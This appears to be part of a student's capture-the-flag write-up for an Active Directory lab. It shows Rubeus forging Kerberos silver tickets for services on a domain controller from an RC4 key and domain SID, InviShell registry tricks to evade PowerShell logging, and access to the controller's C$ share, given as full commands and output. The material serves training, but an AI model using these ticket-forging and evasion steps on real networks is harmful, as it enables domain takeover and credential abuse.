[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC

[*] Domain         : DOLLARCORP.MONEYCORP.LOCAL (dcorp)
[*] SID            : S-1-5-21-719815819-3726368948-3917688648
[*] UserId         : 500
[*] Groups         : 544,512,520,513
[*] ServiceKey     : 4855E21503A77D55411CB38F183CB60E
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey         : 4855E21503A77D55411CB38F183CB60E
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_MD5
[*] Service        : rpcss
[*] Target         : dcorp-dc.dollarcorp.moneycorp.local

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'Administrator' to 'rpcss/dcorp-dc.dollarcorp.moneycorp.local'

[*] AuthTime       : 10/23/2025 5:58:42 AM
[*] StartTime      : 10/23/2025 5:58:42 AM
[*] EndTime        : 10/23/2025 3:58:42 PM
[*] RenewTill      : 10/30/2025 5:58:42 AM

[*] base64(ticket.kirbi):

      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
      Y29ycC5tb25leWNvcnAubG9jYWw=


[+] Ticket successfully imported!


c:\Users\student98>klist

Current LogonId is 0:0x14e3f3c4

Cached Tickets: (2)

#0>     Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: rpcss/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 10/23/2025 5:58:42 (local)
        End Time:   10/23/2025 15:58:42 (local)
        Renew Time: 10/30/2025 5:58:42 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:

#1>     Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: host/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 10/23/2025 5:58:07 (local)
        End Time:   10/23/2025 15:58:07 (local)
        Renew Time: 10/30/2025 5:58:07 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:

c:\Users\student98>

.

let’s try to use WMI commands on the domain controller:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc
c:\Users\student98>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
c:\Users\student98>set COR_ENABLE_PROFILING=1
c:\Users\student98>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}
c:\Users\student98>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
The operation completed successfully.
c:\Users\student98>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f
The operation completed successfully.
c:\Users\student98>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.
c:\Users\student98>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Users\student98> Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc

SystemDirectory : C:\Windows\system32
Organization    :
BuildNumber     : 20348
RegisteredUser  : Windows User
SerialNumber    : 00454-30000-00000-AA745
Version         : 10.0.20348

PS C:\Users\student98>

.

Silver ticket for CIFS for accessing filesystem

C:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

.

c:\Users\student98>klist

Current LogonId is 0:0x15a4ce2a

Cached Tickets: (1)

#0>     Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: cifs/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 10/24/2025 2:53:53 (local)
        End Time:   10/24/2025 12:53:53 (local)
        Renew Time: 10/31/2025 2:53:53 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:


c:\Users\student98>dir \\dcorp-dc.dollarcorp.moneycorp.local\c$
 Volume in drive \\dcorp-dc.dollarcorp.moneycorp.local\c$ has no label.
 Volume Serial Number is 1A5A-FDE2

 Directory of \\dcorp-dc.dollarcorp.moneycorp.local\c$

01/16/2025  09:48 AM    <DIR>          Azure ATP Sensor Setup
11/17/2024  01:19 AM            36,392 Microsoft.Tri.Sensor.Deployment.Deployer.exe
05/08/2021  01:20 AM    <DIR>          PerfLogs
01/16/2025  09:49 AM    <DIR>          Program Files
05/08/2021  02:40 AM    <DIR>          Program Files (x86)
04/01/2025  08:44 AM    <DIR>          Users
01/06/2025  12:40 AM    <DIR>          Windows
               1 File(s)         36,392 bytes
               6 Dir(s)   9,498,357,760 bytes free

c:\Users\student98>

.

Flag 18 [dcorp-dc] – The service whose Silver Ticket can be used for winrs or PowerShell Remoting 🚩

As we can see in the previous task the XXXX service can be used for winrs or PowerShell Remoting.